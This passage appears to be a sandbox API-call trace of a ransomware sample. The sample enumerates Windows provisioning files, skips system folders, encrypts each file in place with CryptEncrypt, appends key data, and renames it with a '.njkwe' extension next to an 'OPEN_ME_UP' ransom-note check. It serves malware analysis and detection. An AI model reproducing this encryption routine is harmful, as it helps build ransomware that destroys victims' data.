(lpString1="369__Connections_Cellular_PrimTel (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.674] lstrcmpiW (lpString1="369__Connections_Cellular_PrimTel (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.674] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\369__Connections_Cellular_PrimTel (Russian Federation)_i0$(__MVID)@WAP.provxml") returned 172 [0078.674] StrStrIW (lpFirst="369__Connections_Cellular_PrimTel (Russian Federation)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.674] lstrcmpW (lpString1="369__Connections_Cellular_PrimTel (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.674] lstrcmpW (lpString1="369__Connections_Cellular_PrimTel (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.674] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\369__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.674] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\369__Connections_Cellular_PrimTel (Russian Federation)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\369__connections_cellular_primtel (russian federation)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.675] GetTickCount () returned 0x1153ff3 [0078.675] GetTickCount () returned 0x1153ff3 [0078.675] GetTickCount () returned 0x1153ff3 [0078.675] GetTickCount () returned 0x1153ff3 [0078.675] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.675] GetProcessHeap () returned 0xbe0000 [0078.675] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0078.675] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2dc, lpOverlapped=0x0) returned 1 [0078.677] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd24, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.677] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2dc, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2dc, lpOverlapped=0x0) returned 1 [0078.677] GetProcessHeap () returned 0xbe0000 [0078.677] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0078.677] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.677] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.677] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.677] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.677] CloseHandle (hObject=0x43c) returned 1 [0078.677] GetProcessHeap () returned 0xbe0000 [0078.677] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.677] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\369__Connections_Cellular_PrimTel (Russian Federation)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 192 [0078.677] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\369__Connections_Cellular_PrimTel (Russian Federation)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\369__connections_cellular_primtel (russian federation)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\369__Connections_Cellular_PrimTel (Russian Federation)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\369__connections_cellular_primtel (russian federation)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.678] GetProcessHeap () returned 0xbe0000 [0078.678] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.678] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x901fba3a, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x901fba3a, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x901fba3a, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x28e, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="36__Connections_Cellular_Grameen Phone (Bangladesh)_i0$(__MVID)@WAP.provxml", cAlternateFileName="36__CO~1.PRO")) returned 1 [0078.678] lstrcmpiW (lpString1="36__Connections_Cellular_Grameen Phone (Bangladesh)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.678] lstrcmpiW (lpString1="36__Connections_Cellular_Grameen Phone (Bangladesh)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.678] lstrcmpiW (lpString1="36__Connections_Cellular_Grameen Phone (Bangladesh)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.678] lstrcmpiW (lpString1="36__Connections_Cellular_Grameen Phone (Bangladesh)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.678] lstrcmpiW (lpString1="36__Connections_Cellular_Grameen Phone (Bangladesh)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.678] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\36__Connections_Cellular_Grameen Phone (Bangladesh)_i0$(__MVID)@WAP.provxml") returned 169 [0078.678] StrStrIW (lpFirst="36__Connections_Cellular_Grameen Phone (Bangladesh)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.679] lstrcmpW (lpString1="36__Connections_Cellular_Grameen Phone (Bangladesh)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.679] lstrcmpW (lpString1="36__Connections_Cellular_Grameen Phone (Bangladesh)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.679] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\36__Connectio", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.679] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\36__Connections_Cellular_Grameen Phone (Bangladesh)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\36__connections_cellular_grameen phone (bangladesh)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.679] GetTickCount () returned 0x1153ff3 [0078.679] GetTickCount () returned 0x1153ff3 [0078.679] GetTickCount () returned 0x1153ff3 [0078.679] GetTickCount () returned 0x1153ff3 [0078.679] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.679] GetProcessHeap () returned 0xbe0000 [0078.679] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0078.679] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x28e, lpOverlapped=0x0) returned 1 [0078.680] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd72, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.681] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x28e, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x28e, lpOverlapped=0x0) returned 1 [0078.681] GetProcessHeap () returned 0xbe0000 [0078.681] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0078.681] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.681] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.681] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.681] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.681] CloseHandle (hObject=0x43c) returned 1 [0078.681] GetProcessHeap () returned 0xbe0000 [0078.681] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.681] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\36__Connections_Cellular_Grameen Phone (Bangladesh)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 189 [0078.681] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\36__Connections_Cellular_Grameen Phone (Bangladesh)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\36__connections_cellular_grameen phone (bangladesh)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\36__Connections_Cellular_Grameen Phone (Bangladesh)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\36__connections_cellular_grameen phone (bangladesh)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.682] GetProcessHeap () returned 0xbe0000 [0078.682] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.682] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90d9b6fb, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90d9b6fb, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90d9b6fb, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x315, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="370__Connections_Cellular_Uraltel (Russian Federation)_i0$(__MVID)@WAP.provxml", cAlternateFileName="370__C~1.PRO")) returned 1 [0078.682] lstrcmpiW (lpString1="370__Connections_Cellular_Uraltel (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.682] lstrcmpiW (lpString1="370__Connections_Cellular_Uraltel (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.682] lstrcmpiW (lpString1="370__Connections_Cellular_Uraltel (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.682] lstrcmpiW (lpString1="370__Connections_Cellular_Uraltel (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.682] lstrcmpiW (lpString1="370__Connections_Cellular_Uraltel (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.682] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\370__Connections_Cellular_Uraltel (Russian Federation)_i0$(__MVID)@WAP.provxml") returned 172 [0078.682] StrStrIW (lpFirst="370__Connections_Cellular_Uraltel (Russian Federation)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.682] lstrcmpW (lpString1="370__Connections_Cellular_Uraltel (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.682] lstrcmpW (lpString1="370__Connections_Cellular_Uraltel (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.682] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\370__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.682] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\370__Connections_Cellular_Uraltel (Russian Federation)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\370__connections_cellular_uraltel (russian federation)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.683] GetTickCount () returned 0x1153ff3 [0078.683] GetTickCount () returned 0x1153ff3 [0078.683] GetTickCount () returned 0x1153ff3 [0078.683] GetTickCount () returned 0x1153ff3 [0078.683] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.683] GetProcessHeap () returned 0xbe0000 [0078.683] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0078.683] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x315, lpOverlapped=0x0) returned 1 [0078.684] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffceb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.684] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x315, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x315, lpOverlapped=0x0) returned 1 [0078.684] GetProcessHeap () returned 0xbe0000 [0078.684] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0078.684] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.684] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.684] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.685] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.685] CloseHandle (hObject=0x43c) returned 1 [0078.685] GetProcessHeap () returned 0xbe0000 [0078.685] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.685] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\370__Connections_Cellular_Uraltel (Russian Federation)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 192 [0078.685] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\370__Connections_Cellular_Uraltel (Russian Federation)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\370__connections_cellular_uraltel (russian federation)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\370__Connections_Cellular_Uraltel (Russian Federation)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\370__connections_cellular_uraltel (russian federation)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.686] GetProcessHeap () returned 0xbe0000 [0078.686] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.686] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90d9b6fb, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90d9b6fb, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90d9b6fb, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2de, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="371__Connections_Cellular_Yeniseytelecom (Russian Federation)_i0$(__MVID)@WAP.provxml", cAlternateFileName="371__C~1.PRO")) returned 1 [0078.686] lstrcmpiW (lpString1="371__Connections_Cellular_Yeniseytelecom (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.686] lstrcmpiW (lpString1="371__Connections_Cellular_Yeniseytelecom (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.686] lstrcmpiW (lpString1="371__Connections_Cellular_Yeniseytelecom (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.686] lstrcmpiW (lpString1="371__Connections_Cellular_Yeniseytelecom (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.686] lstrcmpiW (lpString1="371__Connections_Cellular_Yeniseytelecom (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.686] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\371__Connections_Cellular_Yeniseytelecom (Russian Federation)_i0$(__MVID)@WAP.provxml") returned 179 [0078.686] StrStrIW (lpFirst="371__Connections_Cellular_Yeniseytelecom (Russian Federation)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.686] lstrcmpW (lpString1="371__Connections_Cellular_Yeniseytelecom (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.686] lstrcmpW (lpString1="371__Connections_Cellular_Yeniseytelecom (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.686] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\371__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.686] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\371__Connections_Cellular_Yeniseytelecom (Russian Federation)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\371__connections_cellular_yeniseytelecom (russian federation)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.686] GetTickCount () returned 0x1154003 [0078.686] GetTickCount () returned 0x1154003 [0078.686] GetTickCount () returned 0x1154003 [0078.686] GetTickCount () returned 0x1154003 [0078.686] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.686] GetProcessHeap () returned 0xbe0000 [0078.686] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0078.686] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2de, lpOverlapped=0x0) returned 1 [0078.688] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd22, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.688] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2de, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2de, lpOverlapped=0x0) returned 1 [0078.688] GetProcessHeap () returned 0xbe0000 [0078.688] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0078.688] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.688] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.688] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.688] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.688] CloseHandle (hObject=0x43c) returned 1 [0078.688] GetProcessHeap () returned 0xbe0000 [0078.688] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.689] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\371__Connections_Cellular_Yeniseytelecom (Russian Federation)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 199 [0078.689] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\371__Connections_Cellular_Yeniseytelecom (Russian Federation)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\371__connections_cellular_yeniseytelecom (russian federation)_i0$(__mvid)@wap.provxml"), 